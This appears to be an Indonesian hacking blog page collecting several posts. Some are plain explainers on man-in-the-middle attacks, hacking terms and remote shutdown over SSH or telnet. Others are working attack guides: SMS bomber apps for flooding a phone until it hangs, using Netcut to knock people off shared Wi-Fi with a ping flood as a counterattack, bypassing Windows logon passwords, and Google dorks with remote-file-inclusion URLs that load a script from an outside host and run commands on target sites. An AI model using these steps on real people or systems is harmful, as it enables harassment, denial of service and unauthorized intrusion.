Tampilkan postingan dengan label Seni Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Seni Hacking. Tampilkan semua postingan
Senin, 31 Oktober 2011 0 komentar

Aplikasi Boomber SMS (Flooder SMS) Handphone

Aplikasi Boomber SMS (Flooder SMS) Handphone - Akhir-akhir ini banyak sekali terjadi pengiriman sms yang tidak kita hendaki masuk ke handphone kita, seperti beberapa waktu lalu saya menerima pesan seperti ini :

"tolong donk mama isiin pulsa 25rbu, mama sedang di kantor polisi. isi pulsanya ke np 0855884***, ini mama sedang pinjem hp temen. nanti uangnya mama ganti"

Mungkin anda pernah mendapatkan sms seperti itu, iya kan ?? ini merupakan salah satu modus penipuan berkedok minta pulsa dari mama. Kadang hal ini sangat mengganggu kita ada sms seperti itu.

Cukup ceritanya skrang Kembali ke topik tentang Aplikasi Boomber SMS (Flooder SMS) Handphone , salah satunya yaitu Xsms,

Xsms aplikasi Boomber sms



Xsms merupakan sebuah aplikasi yang dapat digunakan untuk mengirimkan pesan melalui handphone secara bersamaan dan terus menerus dalam jumlah cukup banyak bisa puluhan, ratusan bahkan sampai ribuan sms tanpa kita harus kirim satu per satu tetapi kita cukup seting berapa sms dengan aplikasi ini dan langsung secara bersamaan kita send.  

Postingan kali ini dibuat semata-mata hanya sebagai bahan pengetahuan, tidak ada niat untuk disalah gunakan,

Melakukan SMS Bomb dengan cara Mengkoneksikan PC dengan HP, jika tidak memiliki PC pribadi bisa menggunakannya, tentunya dengan menginstall Aplikasinya.

Sebenarnya Aplikasi ini diciptakan untuk Keperluan Perusahaan untuk menangani Kliennya, Tapi karena Banyaknya Pelaku Penipuan AKhirnya APlikasi ini Di Gunakan untuk BALAS DENDAM pada sang Penipu.

Apa Akibatnya Jika sebuah NO di SMS terus menerus???, Maka Otomatis No yang di tuju HPnya akan Hang alias Error ini akibat memory SIm card atau Hpnya Banjir SMS. Sekarang sudah Jelas bukan?.

Saya tidak bermaksud Membantu anda untuk Balas dendam, Tapi mari kita berikan Efek Jera pada si Penipu/pengganggu.

Langsung saja pertama download aplikasi Xsms ini dan instalkan di hp anda.

1. Pertama jalankan aplikasi Xsms yang telah anda download dan instal tersebut

2. Setelah itu akan muncul kotak, nah anda masukkan no HP tujuan

3. Kemudian masukkan berapa jumlah sms yg akan anda kirim, bisa 10, 100 bahkan 1000

4. Setelah itu masukkan pesan anda

5. Langkah terakhir anda tinggal tekan tombol OK.  Maka secara otomatis sms akan di kirim sesuai dengan perintah pesan yang tadi telah kita setting. Download Xsms full

Yang perlu diperhatikan aplikasi Xsms ini menggunakan sistem sms biasa jadi sebaiknya digunakan jika kita mendapatkan bonus sms saja kecuali jika anda ingin pulsa cepat habis. Perbandingan jika tidak memiliki bonus sms, 1 kali sms misal saja sudah 150 kalau tadi anda memasukkan perntah untuk flood 100 sms maka anda harus mengeluarkan 150 x 100 = 15.000.

Silahkan download beberapa aplikasi Boomber sms yang telah saya kumpulkan di bawah ini selagi masih ada (pilih salah satu untuk mencobanya) : saya pun belum semua mencoba, dengan usaha smoga bermanfaat.


SMS BOMBER s40 dan semua jenis ponsel yang support java MIDP 2.0

SMS BOMBER s60 v2 ( Nokia type 3230, 3260, 6600, 6620, 6630, 6670, 6680, 6681, 6682, 7610 ,N70 ,N72 ,N-Gage )

SMS BOMBER s60 v3 ( Nokia 3250, N71, N73, N75, N80, N91, N92, N93, N93i, N95 6120c )

SMS BOMBER s60 v5 ( 5228, 5230, 5233, 5235, 5530, 5800, x6, c6, n97/mini, ) versi lainnya disini

Sekian dulu dari saya tentang Aplikasi Boomber SMS (Flooder SMS) Handphone Ratusan pesan hanya sekali klik.

Pada saat uji coba ini masih dapat berjalan, jika terjadi gagal atau eror mungkin ada faktor dari kecocokan antara aplikasi ini dengan handphone anda. Silahkan isi kotak komentar jika ada yang ingin ditanyakan. :)
Baca selengkapnya »»  
Rabu, 13 Oktober 2010 0 komentar

Menggunakan Dan Mencegah Netcut

Menggunakan dan Mencegah Netcut - Netcut adalah Sebuah aplikasi yang dapat digunakan untuk memotong akses internet pada public/private WIFI hotspot, ataukah sebuah PC LAN workgroup dari client ke server atau sebaliknya. Program ini pada umumnya dipergunakan oleh pengguna jaringan yang ingin mengambil quota (jatah) bandwith untuk dipakai sendiri tanpa mau dishare kepada client yang lain. Jadi pengguna netcut ini bisa disebut PENCURI. Setuju???, sebelumnya artikel ini diambil dari berbagai sumber, seperti gambar di bawah ini :



Berikut Cara Menggunakan Netcut :

1. Download Software Hacking Wifi Menggunakan Netcut Disini Download NetCut 2.81

2. Install Aplikasinya klo ada Antivirus yang menghalangi instalasi DImatikan aja dulu Antivirusnya

3. Setelah beres Instalasinya jalankan Aplikasinya pada desktop netcut

4. nah disini terlihat ada ikon monitor yang menunjukkan para Laptop yang lagi terhubung internet dalam 1 jaringan cafe, penjelasan simpel nya ikon monitor paling atas itu adalah Gateway internet dan di bawahnya adalah komputer kalian.
jadi jangan sampai Cutoff sendiri gateway dan komputer sendiri sama aja bunuh diri .

5. setelah itu pilih IP yang mau di putus lalu pilih cutoff. dan usaha anda berhasil membalas kelakuan para orang usil.

Mungkin ada di benak sobat blogger sungguh berbahaya sekali Tools ini untuk di buat isengin kampus atau cafe yang ada akses free Wifi. tapi tools ini sangat mudah di jinakkan dengan berbagai macam cara. ingin tau Cara Mengatasinya?? okey lanjut…

Tapi sebelum Melanjutkan Cara Mencegah Netcut saya ingin berbicara dikit tentang Cara kerja Software Netcut, Netcut adalah software yang hanya berkerja berdasarkan ARP Spoofing , ARP itu Adalah Address Resolution Protocol Masih belum Ngerti apa itu ARP.. okey begini saya beri contoh:

Komputer A(komputer dengan IP 10.10.1.100) dan Komputer B(Komp Server Mempunyai IP 10.10.1.1) Dalam keadaan ini Komp A Ingin melakukan Koneksi Ke Komp B Dalam Kondisi Seperti ini Otomatis Komputer A melakukan broadcast (Seperti halnya manusia berteriak-teriak) “Halooo Siapa yang Mempunyai IP 10.10.1.1″ lalu komputer B mendengar dan menjawab Bersetakan MAC ADRESS “disini IP 10.10.1.1 itu 00:0C:A2:D1:1B:3D” Dan Kemudian B Melakukan Broadcast atau teriakan balik “Halo Tadi IP 10.10.1.100 Manggil saya mana yah?” Lalu A menjawab “woiii saya disini IP 10.10.1.100 itu 00:B0:AD:D5:1C-5D” Kejadian Inilah Menjadikan Proses Transaksi Data Antar Komputer.

Setelah sudah paham dengan cerita di atas kita lanjutkan ke cerita berikut ini Yang Berhubungan dengan ARP Spoofing :

Komputer A(komputer dengan ip10.10.1.100) dan Komputer B(Komp Server Mempunyai IP10.10.1.1) dan orang melakukan ARP Spoofing “C” dengan IP 10.10.1.99
Dalam Gambaran Ini DI ceritakan bahwa Komputer A ingin Melakukan Koneksi Ke Komputer B, Komputer A Melakukan Broadcast

“Halooo siapa yang Mempunyai IP 10.10.1.1“ Bukanya Komputer B yang jawab Tapi Yang Jawab Yaitu Komputer ARP SPOOFING “C” “WOii saya disini IP 10.10.1.1 00:1E:05:AE:96:F0?”(Komputer C berPura² Menjadi Komputer B” Lalu KOMPUTER “C” broadcast ““Halooo siapa yang Mempunyai IP 10.10.1.1“(Komputer C Berpura² Menjadi Komputer A) dan dijawab sama B “WOIii saya disini Gan IP 10.10.1.1 00:1E:05:AE:96:F0?”

Dan Komputer B Melakukan Broadcast(”Halooo gan Siapa yang Mempunyai ip10.10.1.100) LAlu DI jawab Oleh Komputer C (”WOIii saya disini Gan IP 10.10.1.99 ada di 00:22:FA:AE:96:F0 ( yg disebutin adalah Mac Adress Kepunyaan C / berpura2 menjadi A)” C teriak berpura² menjadi B “Woi Siapa IP 10.10.1.100 yg tadi manggil ? “
“IP 10.10.1.100 ada di 00:1E:C107B0-Z0 ( Mac Adress Kepunyaan A )”

Kurang lebih seperti itu penjelasan gambaran diatas. dan dapat di simpulkan Bahwa :

ARP Spoofing itu Ingin Mengasosiasikan Mac Adress C Dengan IP adress Komputer lain)
Kiriman paket data yang dikirimkan ke A Akan mengalami kesalahn Pengiriman Ke Komputer C Dan “C” dapat dengan leluasa untuk Melakukan Cutoff data tersebut ke komputer G atau memodifikasi isi dari data paket sebelum dikirim.kan

Sehingga Untuk Mengatasi Hacker Yang menggunakan Netcut di publik Wifi adalah Dengan Cara :

1. Check ARP (Address Resolution Protocol)
- buka cmd (command prompt) pada startmenu > run
- ketik arp -a, untuk meilhat ip router. dan akan terlihat 1 ip router, jika terlihat lebih dari satu ubah niat anda untuk Surfing karena protokol tidak encrypt seperti FTP dan HTTP login untuk menghindari Hacker Usil.
- untuk mengidentifikasi arp ip yang muncul ketikan perintah, tracert domain.com

2. Ubah alamat ip Addres
karena netcut melisting ip addres di dalam jaringan, maka kamu harus mengganti alamat ip. saran saya ubah kedekat dengan ip server atau gateway untuk mengelabui si attacker netcut.

3. Matikan layanan workstation.
- Run, kemudian ketik services.msc
- cari layanan workstation
- jika sudah ketemu, klik kanan, properties, klik tombol stop

4. Ganti hostname atau nama komputer anda.
hostname yang tervisible sangat rentan sekali untuk diserang, oleh karena itu disarankan untuk mengganti dengan hostname yang dekat dengan kepentingan jaringan.

5. Bisa menggunakan software bantu/Penangkal.
cari software anti NetCut atau Anti Arp, sebelum berselancar untuk pertama kali menghidupkan wifi anda pastikan Anti NetCut atau AntiARP anda telah aktif.

6. Serang balik si attacker.
karena si pengguna netcut ini sebagai gateway, banjiri komputer dia dengan ping secara terus menerus dengan mengetikan “ping google.com -t” pada cmd (command prompt) run. cara ini akan membuat komputer pengguna netcut hang.

7. Gerak-gerik pengguna NetCut
Kalau tiba2 koneksi putus secara aneh atau serentak seluruh user tanpa ada warning dari pihak Admin CAFENET coba kamu perhatikan salah satu user yg terlihat santai dan masih tetap online dengan lancar, kemungkinan itu pengguna netcut.

Demikian beberapa tips tentang Menggunakan dan Mencegah Netcut seperti langkah diatas, semoga bermanfaat.
Baca selengkapnya »»  
Selasa, 29 Juni 2010 0 komentar

Remote Komputer Menggunakan Ssh Dan Telnet

Pada kesempatan kali ini ada tulisan menarik tentang mematikan komputer dari jarak jauh melalui remote ssh dan telnet semua ini dilakukan didalam jaringan yang terkoneksi.

 Gambar: Ssh dan Telnet menggunakan Putty
Konsep untuk mematikan komputer ini sangatlah sederhana hal-hal yang diperlukan hanyalah dua buah komputer yang terkoneksi melalui jaringan LAN maupun internet dan mempunyai IP addressnya masing-masing. Selanjutnya masing-masing komputer diberikan service telnet ataupun ssh sebagai server yang aktif.

Setelah terkoneksi untuk mematikan komputer pun tidak sulit karena hanya dibutuhkan beberapa baris command yang mudah. Oleh karena itu marilah kita lihat lebih jauh lagi
bagaimana cara untuk mematikan komputer melalui service ssh maupun telnet.

A. System Requirements

1. Operating System yang mendukung networking. Dalam project ini kami menggunakan Windows XP.
2. 2 buah network interface card.
3. Kabel LAN dengan jack RJ-45.
4. Menggunakan Peer to Peer connection.

B. Langkah-langkah mengaktifkan telnet server
Pada dasarnya setiap windows XP sudah terdapat services telnet namun services ini tidak diaktifkan.

1. Buka Control Panel, pilih Administration Tools, pilih Services.
2. Cari telnet services buka dengan klik dua kali.
3. Aktifkan telnet service pada modus automatic sehingga saat komputer direstart service ini pun tetap aktif.
4. Karena kita tidak ingin melakukan restart lakukan pengaktifan telnet service dengan mengetik start.

C. Langkah-langkah mengaktifkan ssh server
Linux yang kita gunakan adalah versi debian ubuntu pada linux versi ini ssh-server tidak terdapat dalam sistem, oleh karena itu dibutuhkan penginstallan aplikasi ini.

1. Pastikan komputer terkoneksi dengan internet.
2. sudo apt-get update (untuk mengupdate repisotory)
3. sudo apt-get install openssh-server.

D. Langkah-langkah mempersiapkan telnet client.

1. Untuk windows cukup mengaktifkan command prompt di dalam windows.
2. Untuk linux cukup mengaktikan terminal melalui start menu program.

E. Langkah-langkah mempersiapkan ssh client.

1. Untuk linux buka terminal melalui start menu program.
2. Untuk windows dapat menggunakan program tambahan semisal putty.

F. Mekanisme kerja:
Konsep yang perlu diperhatikan adalah:

1. SSH terdiri dari dua jenis yaitu ssh-server dan ssh-client.
2. Telnet terdiri dari dua jenis yaitu telnet-server dan telnet-client.
3. Ssh-server hanya dapat berjalan di pc berbasis linux.
4. Telnet-server hanya dapat berjalan di pc berbasis windows.
5. Basic command dari ssh mirip dengan basic comand di terminal linux.
6. Basic command dari telnet mirip dengan basic command di command prompt windows.
7. Ssh-client dapat berjalan di linux cukup dengan menggunakan terminal dari linux itu sendiri.
8. Ssh-client dapat berjalan di windows dengan menggunakan program tambahan putty.
9. Telnet-client dapat berjalan di linux cukup dengan menggunakan terminal dari linux itu sendiri.
10. Telnet-client dapat berjalan di windows dengan menggunakan command prompt dari windows itu sendiri.

G. Mematikan komputer melalui service ssh.
Pada konsepnya adalah sebagai berikut :
Komputer 1 > Komputer 2
Komputer 1 akan mencoba untuk mematikan komputer 2 oleh karena itu berikut beberapa
prinsip:

1. Ssh-client dapat berupa windows ataupun linux.
2. Ssh-server hanya dapat dijalankan di linux.

Step melalui terminal linux:

1. Buka terminal linux.
2. Ketikan ssh user_name@ip_address
3. Masukkan password
4. Ketikkan sudo shutdown -h now

Penjelasan:

* user_name adalah user name yang dipakai di komputer linux yang akan dimatikan
* ip_address adalah alamat ip yang dipakai di komputer linux yang akan dimatikan.
* sudo menyatakan diri kita sebagai root atau administrator yang berhak.
* -h menyatakan untuk mematikan keseluruhan sitem.
* now menyatakan untuk mematikan pada saat command itu diexecute.

H. Mematikan komputer melalui service telnet.
Pada konsepnya adalah sebagai berikut.
Komputer 1 > Komputer 2
Telnet-client Telnet-server.
Komputer 1 akan mencoba untuk mematikan komputer oleh karena itu berikut beberapa
prinsip:

1. Telnet-client dapat berupa windows ataupun linux.
2. Telnet-server hanya dapat dijalankan di windows.
3. Step melalui command prompt windows.
4. Buka terminal windows.
5. Ketikan telnet ip_address;
6. Masukkan password.
7. Ketikkan shutdown -s

Penjelasan:

* user_name adalah user name yang di pakai di komputer 2 atau komputer windows yang akan dimatikan.
* Ip_address adalah alamat ip komputer yang akan dimatikan.
* -s menyatakan untuk mematikan komputer sekarang juga.

Kesimpulan

1. Mematikan komputer melalui jarak jauh bukanlah hal yang sulit. Komputer yang akan dimatikan dalam konsep ini haruslah berbasiskan ip address karena telnet dan ssh hanya akan bekerja melalui ip address yang harus di set dimasing-masing komputer.
2. telnet melalui ssh melalui port masing-masing 23 dan 22.
3. Firewall dapat mematikan setiap destinasi port 23 dan 22 sehingga disarankan agar anda mematikan semua firewall yang aktif.
4. Setiap komputer yang terkoneksikan kedalam jaringan internet dapat dimatikan melalui jarak jauh dengan mengarahkan ssh dan telnet ke ip address yang di konfigurasikan dalam hal ini ip address tersebut haruslah merupakan ip address public bukan ip address internal.
5. Koneksi melalui internet dapat membahayakan jaringan anda maka disarankan jangan melalukan remote melalui jarak jauh apalagi melakukannya dengan telnet usahakanlah melakukannya jarang mungkin dan bukan di komputer public. Jika anda akan sering melakukannya anda dapat menggunakan jaringan yang bersifat private seperti VPN.
6. Tidak semua komputer yang memiliki ip_address public dapat dikoneksikan melalui telnet dan ssh karena banyaknya router yang bersifat secure dengan tidak memperbolehkan koneksi dengan port tertentu.

Saran

1. untuk menginstall aplikasi melalui apt-get yang terdapat dalam linux anda dapat menggunakan repisotory local seperti vlsm.org lakukan customisasi melalui /etc/apt/sources.list
2. Linux ubuntu tidak dapat mendeteksi setiap hardware modem telephone oleh karena itu disarankan untuk mengecek kompatibilitas melalui live cd terlebih dahulu. Installasi linux dapat membuat windows anda hilang perhatikan baik-baik pilihan untuk men-customize partisi anda hindari pemformatan yang tidak perlu.


Semoga bermanfaat...
Baca selengkapnya »»  
Sabtu, 19 Juni 2010 0 komentar

Mengenal Serangan Man-in-The-Middle (MITM)

Mengenal Serangan Man in The Middle Attack (MITM) Sudah banyak artikel di ilmuhacking yang membahas teknik serangan man in the middle (mitm), namun belum pernah saya menjelaskan secara detil tentang apa itu mitm attack. Mitm attack merupakan jenis serangan yang sangat berbahaya dan bisa terjadi di mana saja, baik di website, telepon seluler, maupun di peralatan komunikasi tradisional seperti surat menyurat. Oleh karena itu saya pikir perlu ada satu artikel khusus yang membahas tentang mitm attack terlepas dari apapun dan dimanapun implementasi teknisnya.

Bukan Sekedar Sniffing

Mungkin banyak yang mengira tujuan dari serangan mitm adalah untuk menyadap komunikasi data rahasia, seperti yang sniffing. Sniffing bisa disebut sebagai passive attack karena pada sniffing attacker tidak melakukan tindakan apa-apa selain memantau data yang lewat. Memang benar dengan serangan mitm, seorang attacker bisa mengetahui apa yang dibicarakan oleh dua pihak yang berkomunikasi. Namun sebenarnya kekuatan terbesar dari mitm bukan pada kemampuan sniffingnya, namun pada kemampuan mencegat dan mengubah komunikasi sehingga mitm attack bisa disebut sebagai jenis serangan aktif.

Gambar di bawah ini adalah skenario yang bisa dilakukan attacker dengan serangan mitm.




Pada gambar tersebut terlihat ada 4 macam serangan yang bisa dilakukan dengan MITM. Berikut adalah penjelasan dari jenis serangan tersebut dalam skenario seperti gambar di atas.

* Sniffing: Charlie mengetahui semua pembicaraan antara Alice dan Bob.
* Intercepting: Charlie mencegat pesan dari Alice ketika Alice ingin menutup percakapan dengan “Bob I’m going to sleep, Bye!”. Dengan begini Bob mengira Alice masih berkomunikasi dengannya.
* Tampering: Charlie mengubah jawaban Bob kepada Alice dari account Paypal bob menjadi charlie.
* Fabricating: Charlie menanyakan nomor social security number kepada Bob, padahal pertanyaan ini tidak pernah diajukan oleh Alice.

Dengan cara mitm ini bisa dibayangkan betapa besar potensi kerusakan yang bisa dilakukan Charlie kepada Alice dan Bob.

Proses Terjadinya Serangan Man-in-The-Middle

Dalam serangan mitm, seorang attacker akan berada di tengah-tengah komunikasi antara dua pihak. Seluruh pembicaraan yang terjadi di antara mereka harus melalui attacker dulu di tengah. Attacker dengan leluasa melakukan penyadapan, pencegatan, pengubahan bahkan memalsukan komunikasi seperti yang sudah saya jelaskan sebelumnya.

Sekarang mari kita lihat proses terjadinya MITM dalam contoh kasus Alice berkomunikasi dengan Bob. Charlie sebagai attacker akan berusaha berada di tengah antara Alice dan Bob. Agar Charlie berhasil menjadi orang ditengah, maka Charlie harus:

* menyamar sebagai Bob dihadapan Alice
* menyamar sebagai Alice dihadapan Bob



Dalam mitm, Alice mengira sedang berbicara dengan Bob, padahal dia sedang berbicara dengan Charlie. Begitu juga Bob, dia mengira sedang berbicara dengan Alice, padahal sebenarnya dia sedang berbicara dengan Alice. Jadi agar bisa menjadi orang di tengah Charlie harus bisa menyamar di dua sisi, tidak bisa hanya di satu sisi saja.

Kenapa Alice dan Bob bisa terjebak dan tertipu oleh Charlie? Itu karena Alice dan Bob tidak melakukan otentikasi dulu sebelum berkomunikasi. Otentikasi akan menjamin Alice berbicara dengan Bob yang asli, bukan Bob palsu yang diperankan oleh Charlie. Begitu juga dengan otentikasi, Bob akan berbicara dengan Alice yang asli, bukan Alice palsu yang diperankan oleh Charlie.

Pentingnya Otentikasi: Who Are You Speaking With?

Otentikasi adalah proses untuk membuktikan identitas suatu subjek, bisa orang atau mesin. Proses membuktikan identitas seeorang ada banyak cara, namun semuanya bisa dikelompokkan dalam 3 kategori:

* What you know: PIN, password, pasangan kunci publik-privat
* What you have: smart card, kunci, USB dongle
* What you are: fingerprint, retina

Secara singkat otentikasi menjawab pertanyaan “Who are you speaking with?”. Pertanyaan itu sangat penting diketahui sebelum dua pihak berkomunikasi. Bila dua pihak berkomunikasi tanpa sebelumnya melakukan otentikasi, maka keduanya bisa terjebak berbicara dengan orang yang salah, yaitu orang yang menyamar menjadi lawan bicaranya. Bila sampai ini terjadi maka akibatnya bisa sangat fatal, salah satunya adalah terjadinya mitm attack.

Bila dua orang yang sudah saling mengenal berbicara dengan tatap muka langsung, maka tidak mungkin keduanya terjebak dan tertipu berbicara dengan orang yang salah. Otentikasi menjadi sangat penting bila kedua pihak berbicara melalui media komunikasi jarak jauh seperti telpon atau internet. Dalam komunikasi jarak jauh, kita hanya bisa mendengar suara lawan bicara kita, jadi sangat besar kemungkinan kita berbicara dengan orang yang salah.

Jadi cara untuk mencegah serangan MITM adalah dengan melakukan otentikasi sebelum berkomunikasi. Bahkan walaupun otentikasi dilakukan oleh salah satu pihak saja, itu sudah cukup untuk mencegah mitm. Mari kita lihat kembali contoh Alice, Bob dan Charlie, bila otentikasi hanya dilakukan oleh Bob, sedangkan Alice tidak. Karena tidak adanya otentikasi Alice, maka Charlie bisa menyamar sebagai Alice di hadapan Bob, namun Charlie tidak bisa menyamar sebagai Bob di hadapan Alice. Kenapa Charlie tidak bisa menyamar menjadi Bob? Sebab Alice akan menguji keaslian Bob dengan otentikasi, sehingga penyamaran Charlie sebagai Bob palsu akan terbongkar dan Alice tidak akan mau melanjutkan komunikasi.

Berikut beberapa hal Apa yang dimaksud Serangan Man-in-The-Middle (MITM) dalam dunia Hacking, ini diambil dari berbagai sumber khusunya google
Baca selengkapnya »»  
Jumat, 11 Juni 2010 0 komentar

Istilah-istilah Hacking dan Langkah-langkahnya

Istilah-istilah Hacking dan Langkah-langkahnya  - Apa itu Hacking?? - Asal pertama kata "Hacker" seseorang yang berhasil masuk ke sebuah sistem komputer orang lain dalam jaringan komputer, berawal dari tahun 60-an di Las Vegas di adakan sebuah permainan (Game) yang menggunakan system jaringan komputer (networking) dimana cara permainan itu satu sama lain berusaha untuk masuk ke system komputer lawan (pemain lainya) dan melumpuhkannya. dari sinilah kemudian orang-orang menamakan sekelompok anak-anak muda yang mengikuti permainanan ini sebagai Hackers.



Sehingga Hacking ini merupakan kegiatan yang dilakukan seseorang mencakup bidang komputer dan teknologi dimana ia mencoba dan berusaha masuk ke sebuah sistem komputer orang lain, dengan demikian ia dapat hak akses untuk mengendalikannya. Penjelasan lebih lanjut tentang Hacking   

Kembali ke topik, pada postingan ini ada beberapa istilah-istilah hacking yang mungkin anda belum mengetahuinya, ini khusus untuk newbie seperti saya :). Berikut ini ada beberapa istilah dalam proses hacking bawah ini :

1. Footprinting

Mencari rincian informasi terhadap sistem-sistem untuk dijadikan sasaran, mencakup pencarian informasi dengan search engine, whois, dan DNS zone transfer.

2. Scanning

Terhadap sasaran tertentu dicari pintu masuk yang paling mungkin. Digunakan ping sweep dan port scan.

3. Enumeration

Meneliti sasaran secara intensif ,yang mencari user account absah, network resource and share & aplikasi untuk mendapatkan mana yang proteksinya lemah.

4. Gaining Access/Mendapatkan Akses

Mendapatkan data lebih banyak lagi untuk mulai mencoba mengakses sasaran. Meliputi mengintip dan merampas password, menebak password, serta melakukan buffer overflow.

5. Escalating Privilege/Menemukan Akses Khusus (Root)

Bila baru mendapatkan user password di tahap sebelumnya, di tahap ini diusahakan mendapat privilege admin jaringan dengan password cracking atau exploit sejenis getadmin, sechole, atau lc_messages.

6. Pilfering

Proses pengumpulan informasi dimulai lagi untuk identifikasi mekanisme untuk mendapatkan akses ke trusted system. Mencakup evaluasi trust dan pencarian cleartext password di registry, config file, dan user data.

7. Menutupi Jejak (Covering Tracks)

Begitu kontrol penuh terhadap sistem diperoleh, maka menutup jejak menjadi prioritas. Meliputi membersihkan network log dan penggunaan hide
tool seperti macam-macam rootkit dan file streaming.

8. Membuat Pintu Belakang (Creating Backdoors)

Pintu belakang diciptakan pada berbagai bagian dari sistem untuk memudahkan masuk kembali ke sistem ini dengan cara membentuk user account palsu,menjadwalkan batch job, mengubah startup file, menanamkan service pengendali jarak jauh serta monitoring tool, dan menggantikan aplikasi dengan trojan.


9. Denial of Service (DOS)

Bila semua usaha di atas gagal, penyerang dapat melumpuhkan sasaran sebagai usaha terakhir Meliputi SYN flood, teknik-teknik ICMP, Supernuke,land/latierra, teardrop, bonk, newtear, trincoo, trini00, dan lain-lain.

10. Phising

adalah tindakan memperoleh informasi pribadi seperti User ID, password, PIN, nomor rekening bank, nomor kartu kredit Anda secara ilegal.

11. Keylogger

adalah mesin atau software yang dipasang atau diinstal di komputer agar mencatat semua aktivitas yang terjadi pada keyboard (bekerja diam diam alias tidak terketahui oleh kita secara kasat mata)

12. Fake Login

Halaman tiruan/palsu yang dibuat untuk mengelabui user, bertujuan untuk mencuri informasi penting dari user (eg. username, password, email). Seperti pada kasus pencurian email n password Friendster, Facebook, dll.

13. Fake Process

Proses tiruan yang dibuat untuk menyembunyikan nama proses asli, bertujuan untuk mengelabui admin sistem. Seperti mem-fake "./backdoor" menjadi "usr/sbin/httpd", sehingga ketika di "ps -ax", proses "./backdoor" berubah menjadi "usr/sbin/httpd".

14. Malicious Code/Script

Kode yg dibuat untuk tujuan jahat atau biasa disebut kode jahat.

15. Virus

Kode jahat yg sistim kerjanya seperti virus pada manusia, menggandakan diri dan seperti parasit menopang pada file yg diinfeksinya. File yg terinfeksi menjadi rusak atau ukurannya bertambah. Sekarang kode jenis ini akan sangat mudah terdeteksi pada aplikasi yg memeriksa crc32 dari dirinya.

16. Worm (Cacing)


Kode jahat yg sistim kerjanya seperti cacing, menggandakan diri dan menyebar, tidak menopang pada file. Kebanyakan di Indonesia adalah kode jenis ini.

17. Trojan (Horse)

Kode jahat yg sistim kerjanya seperti kuda trojan pada zaman kerajaan Romawi, masuk ke dalam sistem untuk mengintip dan mencuri informasi penting yg ada didalamnya kemudian mengirimnya kepada pemilik trojan.

Sekian beberapa Istilah-istilah hacking dan langkah-langkahnya, artikel ini diambil dari berbagai sumber khusunya google semoga memberikan sedikit pengetahuan tentang Hacking.
Baca selengkapnya »»  
Kamis, 10 Juni 2010 0 komentar

Hacking Password Windows Logon


Ophcrack is a Windows password cracker based on a time-memory trade-off using rainbow tables. This is a new variant of Hellman's original trade-off, with better performance. It recovers 99.9% of alphanumeric passwords in seconds.

Download Ophcrack-xp-livecd 2.3.1
Baca selengkapnya »»  
Sabtu, 29 Mei 2010 0 komentar

Hacking Password Windows Dengan PC Login

Langsung saja ya ikuti langkah-langkah berikut :




Cara pertama :

Tekan tombol ctrl + alt + del 2X kemudian ganti namanya dengan administrator Enter. Cara ini jika si Empunya komputer tidak mem-password administrator. Jika di password, terpaksa deh kita gunakan jurus pamungkas.

Cara ke dua:

Untuk cara ini kita menggunakan software PcLogin. Kita bisa men-download Pc Login Now di internet. File hasilnya adalah dalam bentuk .iso. Setelah kita download kita burning ke CD. Kemudian kita lanjutkan dengan booting lewat PcLogin tadi. Sebelumnya tentu saja kita harus setting terlebih dahulu BIOS agar kita bisa booting lewat cd. Setelah itu proses berjalan. Tunggu sampai muncul tampilan Pc Login Now.
Kemudian tinggal kita ikuti saja perintah selanjutnya…

Dapat diunduh disini PC LOGIN NOW
Baca selengkapnya »»  
Minggu, 23 Mei 2010 0 komentar

Google Hacking (Hacking Sebuah Web Dengan Memanfaatkan Google)

Google Hacking - Postingan kali ini membahas tentang bagaimana cara sederhana untuk menyerang/deface sebuah halaman web memanfaatkan mesin pencari seperti Google.

Cara ini mungkin merupakan teknik hacking edisi lama, bagi yang sudah master tidak perlu membacanya :), semoga ini masih berfungsi dengan baik. Langsung saja ikuti langkah dibawah ini untuk Google Hacking (Hacking Sebuah Web Dengan Memanfaatkan Google) :


1. allinurl filename
bugs filename ini targetnya dapat kita cari dengan keyword “allinurl:*.php?filename=*”.
keyword ‘*.php’ bisa di ganti dengan apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?filename=*. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts “
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.

2. allinurl content
bugs content ini targetnya dapat kita cari dengan keyword “allinurl:*.php?content=”.
keyword ‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?content=”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
” http://www.target.com/target/index.php?content=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts “
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.

3. allinurl page
bugs page ini targetnya dapat kita cari dengan keyword “allinurl:*.php?page=*”.
‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?page=”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?page=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.

4. allinurl link
bugs filename ini targetnya dapat kita cari dengan keyword “allinurl:*.php?link=*”.
keyword ‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?link=*”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?link=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.

5.allinurl file
bugs file ini targetnya dapat kita cari dengan keyword “allinurl:*.php?file=*”.
‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?file=*”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?file=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.

